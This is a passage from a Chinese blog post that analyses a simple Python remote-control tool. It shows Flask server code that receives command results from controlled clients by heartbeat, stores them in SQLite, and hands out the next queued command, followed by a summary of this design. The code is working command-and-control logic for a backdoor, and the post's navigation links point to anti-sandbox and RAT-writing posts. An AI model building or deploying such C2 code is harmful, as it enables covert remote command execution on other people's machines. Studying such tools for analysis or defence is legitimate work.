<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> client_result:</span><br><span class="line">    <span class="comment"># 上次结果</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[+] client: &quot;</span>+name+<span class="string">&quot; ip: &quot;</span>+ip+<span class="string">&quot; upload result: &quot;</span>+ client_result)</span><br><span class="line">    db_echo_result = EchoResult.query.<span class="built_in">filter</span>(EchoResult.<span class="built_in">id</span>==client_cmd_id).first()</span><br><span class="line">    db_echo_result.result = client_result</span><br><span class="line">    db.session.commit()</span><br><span class="line"><span class="comment"># 获取是否有需要执行的命令</span></span><br><span class="line">db_echo_result = EchoResult.query.<span class="built_in">filter</span>(EchoResult.client_name==name,EchoResult.ip==ip,EchoResult.result==<span class="literal">None</span>).first()</span><br><span class="line"><span class="keyword">if</span> db_echo_result:</span><br><span class="line">    cmd_id = db_echo_result.<span class="built_in">id</span></span><br><span class="line">    cmd = db_echo_result.cmd</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;[+] server issued cmd:&quot;</span>+cmd+<span class="string">&quot; name: &quot;</span> +name+<span class="string">&quot; ip: &quot;</span>+ip)</span><br><span class="line">    <span class="keyword">return</span> jsonify(&#123;<span class="string">&quot;cmd_id&quot;</span>:cmd_id, <span class="string">&quot;cmd&quot;</span>:cmd&#125;)</span><br><span class="line"><span class="keyword">return</span> jsonify(&#123;&#125;)</span><br></pre></td></tr></table></figure>

<p>这里就是首先获取了上次的结果，检测result参数是否是none，如果是的话，就是需要执行的新命令，返回过去并且等待下一次获取。</p>
<p>其他的路由没有什么讲的，就是几个显示页面，显示一些信息。</p>
<p>在<code>__int__.py</code>文件中定义了数据库文件</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask_sqlalchemy <span class="keyword">import</span> SQLAlchemy</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line">base_dir = os.path.abspath(os.path.dirname(__file__))</span><br><span class="line">app.config[<span class="string">&quot;SQLALCHEMY_DATABASE_URI&quot;</span>] = <span class="string">&#x27;sqlite:///&#x27;</span> + os.path.join(base_dir, <span class="string">&quot;../&quot;</span>, <span class="string">&#x27;miansha3.db&#x27;</span>)</span><br><span class="line">app.config[<span class="string">&quot;SQLALCHEMY_COMMIT_ON_TEARDOWN&quot;</span>] = <span class="literal">True</span></span><br><span class="line"></span><br><span class="line">db = SQLAlchemy(app)</span><br><span class="line"><span class="keyword">from</span> app <span class="keyword">import</span> router</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> app.app_context(): </span><br><span class="line">    db.init_app(app)</span><br><span class="line">    db.create_all()</span><br></pre></td></tr></table></figure>

<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>其实也比较简单，这款远控，毕竟只有执行命令的功能</p>
<p>开发的大概思路就是被控端会定时发起心跳包到服务端，服务端接受心跳包中上一次执行命令的结果，并且返回新的命令。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/wan1/2022/11/12/%E9%80%9A%E8%BF%87%E6%A3%80%E6%B5%8B%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8q%E7%9B%BE%E5%8F%8D%E6%B2%99%E7%AE%B1/" rel="prev" title="通过检测是否存在q盾反沙箱">
      <i class="fa fa-chevron-left"></i> 通过检测是否存在q盾反沙箱
    </a></div>
      <div class="post-nav-item">
    <a href="/wan1/2022/12/04/%E5%85%B3%E4%BA%8E%E8%87%AA%E5%86%99pysocket%E8%BF%9C%E6%8E%A7%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%9D%E8%B7%AF/" rel="next" title="关于自写pysocket远控的一些思路">
      关于自写pysocket远控的一些思路 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%88%86%E6%9E%90%E4%B8%80%E6%AC%BE%E4%BB%85%E8%83%BD%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4%E7%9A%84python%E8%BF%9C%E6%8E%A7"><span class="nav-number">1.</span> <span class="nav-text">分析一款仅能执行命令的python远控</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#client%E7%AB%AF"><span class="nav-number">2.</span> <span class="nav-text">client端</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#web%E7%AB%AF%EF%BC%88%E6%8E%A7%E5%88%B6%E7%AB%AF%EF%BC%89"><span class="nav-number">3.</span> <span class="nav-text">web端（控制端）</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">4.</span> <span class="nav-text">总结</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="十三"
      src="/wan1/images/avatar.gif">
  <p class="site-author-name" itemprop="name">十三</p>
  <div class="site-description" itemprop="description">潜心学习，不骄不躁</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/wan1/archives/">
        
          <span class="site-state-item-count">172</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">16</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">十三</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/wan1/lib/anime.min.js"></script>
  <script src="/wan1/lib/velocity/velocity.min.js"></script>
  <script src="/wan1/lib/velocity/velocity.ui.min.js"></script>

<script src="/wan1/js/utils.js"></script>

<script src="/wan1/js/motion.js"></script>


<script src="/wan1/js/schemes/pisces.js"></script>


<script src="/wan1/js/next-boot.js"></script>




  




  
<script src="/wan1/js/local-search.js"></script>













  

  

<script src="/wan1/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginModelPath":"assets/","model":{"jsonPath":"live2d-widget-model-tsumiki"},"display":{"position":"right","width":300,"height":600},"mobile":{"show":true},"log":false,"pluginJsPath":"lib/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/clicklove.js"></script>
